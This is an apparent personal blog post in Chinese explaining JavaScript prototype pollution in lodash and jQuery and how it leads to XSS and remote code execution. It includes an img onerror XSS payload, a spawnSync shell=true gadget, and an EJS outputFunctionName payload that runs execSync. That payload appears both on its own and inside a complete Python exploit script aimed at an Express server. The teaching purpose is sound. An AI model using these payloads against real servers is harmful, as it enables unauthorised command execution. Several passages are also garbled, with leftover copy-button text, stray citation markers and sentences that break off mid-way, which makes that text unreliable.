<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>xss3 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="XSS 与原型链污染漏洞分析原型链基础知识在 JavaScript 中，每个函数都会在创建时自动生成一个 prototype 对象，作为该函数实例的“显式原型”。任何通过该函数构造的实例，其内部属性 __proto__（隐式原型）都会指向这个 prototype 对象。例如： 123js复制编辑function Person()&#123;&#125;let person1 &#x3D; new Perso">
<meta property="og:type" content="article">
<meta property="og:title" content="xss3">
<meta property="og:url" content="http://example.com/2025/07/19/xss3/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="XSS 与原型链污染漏洞分析原型链基础知识在 JavaScript 中，每个函数都会在创建时自动生成一个 prototype 对象，作为该函数实例的“显式原型”。任何通过该函数构造的实例，其内部属性 __proto__（隐式原型）都会指向这个 prototype 对象。例如： 123js复制编辑function Person()&#123;&#125;let person1 &#x3D; new Perso">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-07-19T11:07:59.000Z">
<meta property="article:modified_time" content="2025-07-19T11:15:36.543Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-xss3" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/07/19/xss3/" class="article-date">
  <time class="dt-published" datetime="2025-07-19T11:07:59.000Z" itemprop="datePublished">2025-07-19</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      xss3
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="XSS-与原型链污染漏洞分析"><a href="#XSS-与原型链污染漏洞分析" class="headerlink" title="XSS 与原型链污染漏洞分析"></a>XSS 与原型链污染漏洞分析</h1><h2 id="原型链基础知识"><a href="#原型链基础知识" class="headerlink" title="原型链基础知识"></a>原型链基础知识</h2><p>在 JavaScript 中，每个函数都会在创建时自动生成一个 <strong>prototype</strong> 对象，作为该函数实例的“显式原型”。任何通过该函数构造的实例，其内部属性 <code>__proto__</code>（隐式原型）都会指向这个 <code>prototype</code> 对象。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑function Person()&#123;&#125;</span><br><span class="line">let person1 = new Person();</span><br><span class="line">console.log(person1.__proto__ === Person.prototype); // true</span><br></pre></td></tr></table></figure>

<ul>
<li><strong><code>prototype</code>（显式原型）</strong>：存在于函数对象上，保存了该构造函数所有实例共享的属性和方法，是实例对象继承的来源。任何函数创建时都会带一个 <code>prototype</code> 属性，默认这个 <code>prototype</code> 对象的 <code>constructor</code> 属性指向函数本身。</li>
<li><strong><code>__proto__</code>（隐式原型）</strong>：存在于每个对象上（所有引用类型均有此属性），它引用了该对象的原型（即构造函数的 <code>prototype</code> 对象）。当访问一个对象属性时，如果自身没有此属性，JavaScript 引擎会沿着 <code>__proto__</code> 指向的原型链逐层向上查找，直到到达 <code>null</code> 为止。</li>
<li><strong><code>constructor</code> 属性</strong>：仅存在于 <strong>prototype 对象上</strong>，指向创建该原型的构造函数本身。实例对象自身通常没有 <code>constructor</code> 属性，但可以通过其 <code>__proto__</code> 原型访问到这个属性，从而知道其构造函数。例如，<code>person1.constructor === Person</code>。<code>constructor</code> 本身对程序运行无直接影响，但它指明了对象的“类型”，可用于识别实例的构造来源。</li>
</ul>
<p>简单来说，函数的 <code>prototype</code> 是实例继承属性的源头，实例对象通过自身的 <code>__proto__</code> 指向该 <code>prototype</code>，而 <code>constructor</code> 则指示函数及其实例的构造者单从constructor这个属性来讲，只有prototype对象才有，每个函数在创建的时候，JS会同时创建一个该函数对应的prototype对象， 该函数创建的对象,该函数本身， 故通过函数创建的对象即使自己没有constructor属性，它也能通过__proto__找到对应的constructor，所以任何对象最终都可以找到其构造函数（ null如果当成对象的话，将null除外）。 示例如下：)。</p>
<h2 id="原型链污染的形成条件与机制"><a href="#原型链污染的形成条件与机制" class="headerlink" title="原型链污染的形成条件与机制"></a>原型链污染的形成条件与机制</h2><p><strong>原型链污染</strong>（Prototype Pollution）指的是攻击者利用程序漏洞，<strong>往原型链上添加、修改或删除属性</strong> 的行为。一旦 <code>Object.prototype</code>（或其他原型对象）被污染，这些属性将被所有对象继承，可能导致程序逻辑异常或代码执行。典型触发条件包括：对象合并&#x2F;克隆时没有正确过滤原型关键字、将不可信输入直接赋值到原型属性等</p>
<p>例如，下面代码直接给所有对象的原型添加了一个属性：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑var a = &#123;name: &#x27;alice&#x27;, age: 18&#125;;</span><br><span class="line">a.__proto__.role = &#x27;administrator&#x27;;</span><br><span class="line">var b = &#123;&#125;;</span><br><span class="line">console.log(b.role);  // 输出 &quot;administrator&quot;</span><br></pre></td></tr></table></figure>

<p>这段代码中，<code>a.__proto__</code> 即 <code>Object.prototype</code>，设置了 <code>role = &#39;administrator&#39;</code> 后，所有新建对象（如 <code>b</code>）都会“继承”这个属性。这就是原型链污染的效果：给原型注入属性后，任何对象都能读取到被污染的属性。如果在项目中存在类似的合并或遍历逻辑（比如递归 merge&#x2F;clone），攻击者只需控制输入数据里的 <code>__proto__</code> 或等价路径（如 <code>constructor.prototype</code>）字段，就能劫持原型。如 lodash 4.17.10 版本中，<code>_.merge(prefix, payload)</code> 会递归合并对象，原生的 <code>safeGet</code> 会忽略 <code>__proto__</code>，但如果攻击者提交 <code>&#123;&quot;constructor&quot;: &#123;&quot;prototype&quot;: &#123;&quot;role&quot;: &quot;admin&quot;&#125;&#125;&#125;</code>，在合并时仍然会把 <code>role: &quot;admin&quot;</code> 写入原型攻击代码中的 &#96;payload：{,，所以访问的用户变成了”VIP”)。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑const _ = require(&#x27;lodash&#x27;);</span><br><span class="line">let prefix = &#123;nickname: &#x27;user&#x27;&#125;;</span><br><span class="line">_.merge(prefix, &#123;&quot;constructor&quot;:&#123;&quot;prototype&quot;:&#123;&quot;role&quot;:&quot;admin&quot;&#125;&#125;&#125;);</span><br><span class="line">// 此时 Object.prototype.role === &quot;admin&quot;</span><br></pre></td></tr></table></figure>

<p>攻击者只要让程序执行这样的合并（如通过提交特殊 JSON），就能污染原型链，影响全局行为攻击代码中的 <code>payload：&#123;,，所以访问的用户变成了“VIP”)[cloud.tencent.com](https://cloud.tencent.com/developer/article/1880443#:~:text=function safeGet(object%2C key) ,key]%3B)。除了合并函数外，**解析用户输入** 时也常出问题，例如解析嵌套的 query string。作者示例中有这样一个演示：如果一个查询字符串解析函数 </code>parseQs<code>把</code>‘<strong>proto</strong>[a]&#x3D;3’<code>转成对象，会在全局原型上赋值</code>a &#x3D; 3<code>，导致后续任何新对象打印 </code>a<code>时都输出</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑var qs = parseQs(&#x27;__proto__[a]=3&#x27;);</span><br><span class="line">var obj = &#123;&#125;;</span><br><span class="line">console.log(obj.a); // 输出 3，因为 Object.prototype.a 被污染了:contentReference[oaicite:22]&#123;index=22&#125;。</span><br></pre></td></tr></table></figure>

<p>由此可见，<strong>触发条件</strong>通常是：程序存在把用户控制的数据以递归方式写入目标对象（或遍历其所有属性）的操作；在此过程中若未过滤 <code>__proto__</code>、<code>constructor</code>、<code>prototype</code> 等关键字段，就会把值写到原型上。一旦原型被污染，后续访问或逻辑判断就可能发生意外变化。</p>
<h2 id="利用原型链污染进行-XSS-或-RCE"><a href="#利用原型链污染进行-XSS-或-RCE" class="headerlink" title="利用原型链污染进行 XSS 或 RCE"></a>利用原型链污染进行 XSS 或 RCE</h2><p>原型链污染本身并不直接执行代码，但能<strong>破坏程序逻辑</strong>或影响数据处理流程，进而与其他漏洞组合造成更严重的后果。常见的攻击手段包括构造 XSS（客户端脚本注入）或 Server-side RCE。</p>
<ul>
<li><p><strong>XSS（跨站脚本）示例</strong>：比如某 web 应用使用模板或 DOM 操作来展示内容，如果攻击者能污染内置属性，就可能触发脚本插入。下例演示了一个简单的 XSS：假设存在代码使用 <code>innerText</code> 来避免 XSS，但由于原型链被污染，攻击者将 <code>Object.prototype.innerHTML</code> 设置成包含 <code>&lt;img onerror&gt;</code> 的字符串，导致逻辑分支被误导，最终使用了 <code>innerHTML</code> 渲染，触发脚本执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑// 攻击者污染原型</span><br><span class="line">Object.prototype.innerHTML = &#x27;&lt;img src=x onerror=alert(1)&gt;&#x27;;</span><br><span class="line">// 假设程序逻辑：</span><br><span class="line">let config = &#123; innerText: &#x27;搜索结果：&#x27; + searchQuery &#125;;</span><br><span class="line">const el = document.createElement(&#x27;h2&#x27;);</span><br><span class="line">if (config.innerHTML) &#123;            // 此处原本为 undefined</span><br><span class="line">    el.innerHTML = config.innerHTML;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    el.innerText = config.innerText;</span><br><span class="line">&#125;</span><br><span class="line">// 因为原型链被污染，config.innerHTML 虚拟为真，于是使用 innerHTML</span><br><span class="line">// 实际插入了带 onerror 的 img，触发 alert(1):contentReference[oaicite:26]&#123;index=26&#125;。</span><br></pre></td></tr></table></figure>

<p>如上所示，原型链污染让原本走安全分支的代码意外执行了不安全的分支，从而完成了 XSS。</p>
</li>
<li><p><strong>RCE（远程代码执行）示例</strong>：在 Node.js 环境中，一些 API 会根据原型属性来改变执行行为。比如 <code>child_process.spawnSync</code> 接受一个选项 <code>shell</code>，默认为 <code>false</code>。如果攻击者通过污染让原型上有 <code>shell: true</code>，那么调用时会误用 shell 模式，从而执行任意命令。示例代码展示了这个过程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑const &#123; spawnSync &#125; = require(&#x27;child_process&#x27;);</span><br><span class="line">// 正常行为：没有 shell，下面命令安全地打印 &quot;123 &amp;&amp; ls&quot;</span><br><span class="line">console.log(spawnSync(&#x27;echo&#x27;, [&#x27;123 &amp;&amp; ls&#x27;], &#123; timeout: 1000 &#125;).stdout.toString());</span><br><span class="line"></span><br><span class="line">// 攻击者在原型上注入 shell=true</span><br><span class="line">Object.prototype.shell = true;</span><br><span class="line">// 此时 spawnSync 会启用 shell，实际执行了 ls：</span><br><span class="line">console.log(spawnSync(&#x27;echo&#x27;, [&#x27;123 &amp;&amp; ls&#x27;], &#123; timeout: 1000 &#125;).stdout.toString());</span><br><span class="line">// 输出包含目录列表，实现了 RCE:contentReference[oaicite:29]&#123;index=29&#125;。</span><br></pre></td></tr></table></figure>

<p>在上例中，原本 <code>spawnSync(&#39;echo&#39;, [&#39;123 &amp;&amp; ls&#39;])</code> 只是把参数当作普通字符串输出，而污染后执行的却是带 <code>&amp;&amp; ls</code> 的 shell 命令，打印了文件列表。这种<strong>脚本 gadget</strong>配合原型污染攻击可导致极高危漏洞。</p>
</li>
<li><p><strong>结合 EJS 模板实现攻击</strong>：作者还给出了一个真实案例：在一个基于 Express + EJS + Lodash 的服务中，通过原型链污染注入恶意脚本到 EJS 渲染过程，最终实现服务器端 RCE。简化后的关键逻辑如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑const express = require(&#x27;express&#x27;);</span><br><span class="line">const bodyParser = require(&#x27;body-parser&#x27;);</span><br><span class="line">const lodash = require(&#x27;lodash&#x27;);</span><br><span class="line">const app = express();</span><br><span class="line">app.use(bodyParser.json());</span><br><span class="line">app.set(&#x27;view engine&#x27;, &#x27;ejs&#x27;);</span><br><span class="line"></span><br><span class="line">app.get(&quot;/&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    let title = &#x27;游客你好&#x27;;</span><br><span class="line">    const user = &#123;&#125;;</span><br><span class="line">    if (user.role === &#x27;vip&#x27;) &#123;</span><br><span class="line">        title = &#x27;VIP你好&#x27;;</span><br><span class="line">    &#125;</span><br><span class="line">    res.render(&#x27;index&#x27;, &#123; title: title &#125;);</span><br><span class="line">&#125;);</span><br><span class="line">app.post(&quot;/&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    let data = &#123;&#125;;</span><br><span class="line">    lodash.merge(data, req.body);</span><br><span class="line">    res.json(&#123; message: &#x27;OK&#x27; &#125;);</span><br><span class="line">&#125;);</span><br><span class="line">app.listen(8888);</span><br></pre></td></tr></table></figure>

<p>该示例同样首先可以用 <code>&#123;&quot;constructor&quot;:&#123;&quot;prototype&quot;:&#123;&quot;role&quot;:&quot;vip&quot;&#125;&#125;&#125;</code> 类型的 payload 让所有用户都成为 VIP（人人 VIP）。更进一步，利用 EJS 模板的机制，攻击者能够注入 JS 代码执行命令。比如向 POST 接口发送如下 JSON：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">json复制编辑&#123;</span><br><span class="line">  &quot;content&quot;: &#123;</span><br><span class="line">    &quot;constructor&quot;: &#123;</span><br><span class="line">      &quot;prototype&quot;: &#123;</span><br><span class="line">        &quot;outputFunctionName&quot;: &quot;a; return global.process.mainModule.constructor._load(&#x27;child_process&#x27;).execSync(&#x27;ls /&#x27;); //&quot;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个 payload 会把 <code>Object.prototype.outputFunctionName</code> 设置为含有 <code>execSync(&#39;ls /&#39;)</code> 的字符串。在 EJS 模板编译时，这个属性会被拼接到输出函数中并执行，导致服务器执行任意命令。作者提供的攻击脚本示例展示了向服务发送上述 payload 并读取命令结果的完整过程。换言之，原型链污染配合 EJS 模板渲染，在不被察觉的情况下为攻击者打开了远程命令执行的后门。</p>
</li>
</ul>
<h2 id="第三方库易受污染的函数分析"><a href="#第三方库易受污染的函数分析" class="headerlink" title="第三方库易受污染的函数分析"></a>第三方库易受污染的函数分析</h2><p>许多常用的第三方库在操作对象时含有深度合并或路径赋值的功能，若未过滤原型相关字段，就容易被污染攻击所利用。典型例子包括：</p>
<ul>
<li><strong>Lodash</strong>：早期版本（如 ≤4.17.11）中的 <code>_.merge</code>、<code>_.mergeWith</code>、<code>_.defaultsDeep</code> 等函数在深度合并对象时对 <code>constructor</code> 验证不足。例如 <code>defaultsDeep</code> 函数允许 <code>&#123;constructor:&#123;prototype:&#123;…&#125;&#125;&#125;</code> 形式的嵌套对象注入，从而污染原型。漏洞 CVE-2019-10744 指出，<code>lodash.defaultsDeep</code> 中对 <code>constructor</code> 没有正确过滤，导致 <code>&#123;constructor:&#123;prototype:&#123;&#125;&#125;&#125;</code> 被注入到 <code>Object.prototype</code>。l﻿odash 的 <code>merge</code> 逻辑虽然有 <code>safeGet</code> 跳过 <code>__proto__</code> 字段，但正如示例所示，攻击者可以改用 <code>constructor.prototype</code> 绕开防护。Snyk 说明中也提到，像 Lodash 这样的递归合并函数如果不安全，对 <code>__proto__</code> 未做特殊处理，就会导致对象合并攻击 to recursive merge attacks)。简言之，<strong>任何未过滤 <code>__proto__</code>&#x2F;<code>constructor</code> 的递归合并库都会构成污染风险</strong>（例如 lodash、Hoek 等库都在报告中被提及。</li>
<li><strong>jQuery</strong>：在 3.4.0 之前的版本里，<code>jQuery.extend</code> 也存在类似漏洞。未受信任的 JSON 输入传给 <code>extend</code> 时，可以修改原型链。例如 CVE-2019-11358 报告指出，通过 <code>extend</code> 合并对象时传入 <code>__proto__</code>，可以污染全局对象原型。漏洞修复后，jQuery 3.4.0 增加了对 <code>__proto__</code> 等关键字段的过滤。</li>
<li><strong>其他库</strong>：除了上述，两种常见场景是 <strong>解析嵌套路径</strong>（如深度解析 query string、路径设置等）和 <strong>对象克隆&#x2F;合并</strong>。如前所述，许多查询字符串解析库（<code>jquery-deparam</code>、<code>jquery-query-object</code>、<code>backbone-query-parameters</code> 等）都曾因支持 <code>a[b][c]</code> 这种格式，而在实现中意外把 <code>__proto__</code> 当作普通属性处理。其他操作对象的库（如 <code>merge</code>、<code>plain-object-merge</code>、<code>immer</code>、<code>mootools</code>、<code>ioredis</code> 等）也多次曝出合并逻辑导致原型污染的漏洞。总之，<strong>任何对用户输入的对象进行深度复制、合并或按路径赋值的功能，都要警惕原型链污染</strong>。</li>
</ul>
<h2 id="实战案例：原型链污染配合-XSS-RCE"><a href="#实战案例：原型链污染配合-XSS-RCE" class="headerlink" title="实战案例：原型链污染配合 XSS&#x2F;RCE"></a>实战案例：原型链污染配合 XSS&#x2F;RCE</h2><p>下面给出一个综合示例：在 Express + EJS 模板的应用中，利用 Lodash 合并漏洞进行原型污染，并最终导致远程代码执行。</p>
<ol>
<li><p><strong>示例环境</strong>：Node.js + Express，路由处理逻辑简化如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">js复制编辑// Express 应用示例</span><br><span class="line">app.get(&quot;/&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    const user = &#123;&#125;;</span><br><span class="line">    const title = (user.role === &#x27;vip&#x27;) ? &#x27;VIP你好&#x27; : &#x27;游客你好&#x27;;</span><br><span class="line">    res.render(&#x27;index&#x27;, &#123; title &#125;);</span><br><span class="line">&#125;);</span><br><span class="line">app.post(&quot;/&quot;, (req, res) =&gt; &#123;</span><br><span class="line">    let data = &#123;&#125;;</span><br><span class="line">    lodash.merge(data, req.body);</span><br><span class="line">    res.json(&#123; message: &quot;OK&quot; &#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<ul>
<li>初始情况下，无论谁访问首页（GET <code>/</code>），<code>user.role</code> 均为 <code>undefined</code>，因此显示“游客你好”。</li>
<li>POST 接口将客户端 JSON 合并到 <code>data</code>，但该数据不在渲染中直接使用。</li>
</ul>
</li>
<li><p><strong>原型污染攻击</strong>：攻击者向 POST 接口发送恶意 JSON，如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">json</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">复制编辑</span><br><span class="line">&#123; &quot;constructor&quot;: &#123; &quot;prototype&quot;: &#123; &quot;role&quot;: &quot;vip&quot; &#125; &#125; &#125;</span><br></pre></td></tr></table></figure>

<p>Lodash 的 <code>merge(data, payload)</code> 会将 <code>role: &quot;vip&quot;</code> 写入全局原型。结果是所有用户访问 GET <code>/</code> 时都被当作 VIP 看到页面（人人 VIP，逻辑如所示）。这个步骤验证了原型链污染的“越权”能力。</p>
</li>
<li><p><strong>代码注入与 RCE</strong>：更进一步，利用 EJS 模板渲染细节，可以将任意 JS 代码注入并执行。在此示例中，EJS 编译过程会使用一个 <code>outputFunctionName</code>（输出函数名）变量拼接模板代码。攻击者可提交如下 payload，使原型链上出现 <code>outputFunctionName</code>，注入恶意代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">json复制编辑&#123;</span><br><span class="line">  &quot;content&quot;: &#123;</span><br><span class="line">    &quot;constructor&quot;: &#123;</span><br><span class="line">      &quot;prototype&quot;: &#123;</span><br><span class="line">        &quot;outputFunctionName&quot;: &quot;a; return global.process.mainModule.constructor._load(&#x27;child_process&#x27;).execSync(&#x27;ls /&#x27;); //&quot;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这条 payload 会导致服务端将字符串 <code>&quot;a; return global.process.mainModule.constructor._load(&#39;child_process&#39;).execSync(&#39;ls /&#39;); //&quot;</code> 拼接到 EJS 输出函数中。实际渲染时，这段代码被当作函数体执行，相当于在服务器上运行了 <code>execSync(&#39;ls /&#39;)</code>。结果攻击者通过访问页面获得了服务器上 <code>ls /</code> 的输出，实现了远程任意命令执行。</p>
</li>
<li><p><strong>示例 Payload</strong>：例如，攻击者可以这样编写请求脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">python复制编辑import requests, json</span><br><span class="line">target_url = &#x27;http://127.0.0.1:8888&#x27;</span><br><span class="line">headers = &#123;&#x27;Content-type&#x27;: &#x27;application/json&#x27;&#125;</span><br><span class="line"></span><br><span class="line"># 使所有用户成为 VIP（逻辑攻击）</span><br><span class="line">payload1 = &#123;&quot;constructor&quot;: &#123;&quot;prototype&quot;: &#123;&quot;role&quot;: &quot;vip&quot;&#125;&#125;&#125;</span><br><span class="line">requests.post(target_url, data=json.dumps(payload1), headers=headers)</span><br><span class="line"></span><br><span class="line"># 利用 EJS 注入执行命令（RCE 攻击）</span><br><span class="line">payload2 = &#123;</span><br><span class="line">  &quot;content&quot;: &#123;</span><br><span class="line">    &quot;constructor&quot;: &#123;</span><br><span class="line">      &quot;prototype&quot;: &#123;</span><br><span class="line">        &quot;outputFunctionName&quot;: &quot;a; return global.process.mainModule.constructor._load(&#x27;child_process&#x27;).execSync(&#x27;ls /&#x27;); //&quot;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">requests.post(target_url, data=json.dumps(payload2), headers=headers)</span><br><span class="line"># 然后 GET / 即可看到命令执行结果</span><br></pre></td></tr></table></figure>

<p>根据实测效果，执行上述代码后通过浏览器访问 <code>http://127.0.0.1:8888/</code> 可以看到命令输出（如文件列表），攻击成功。</p>
</li>
</ol>
<p>综上所述，该实战案例展示了：原型链污染先改变程序逻辑（人人 VIP），再进一步结合模板渲染漏洞实现了服务器端 RCE。其中，关键在于 Lodash 合并时对 <code>constructor.prototype</code> 字段的处理漏洞，以及 EJS 将原型属性纳入渲染输出的机制。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/07/19/xss3/" data-id="cmda5jfkf00023cc27gjgealo" data-title="xss3" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/07/19/xss2/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">xss2</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/07/">July 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/07/19/xss3/">xss3</a>
          </li>
        
          <li>
            <a href="/2025/07/19/xss2/">xss2</a>
          </li>
        
          <li>
            <a href="/2025/07/19/xss1/">xss1</a>
          </li>
        
          <li>
            <a href="/2025/07/13/zuoye/">zuoye</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>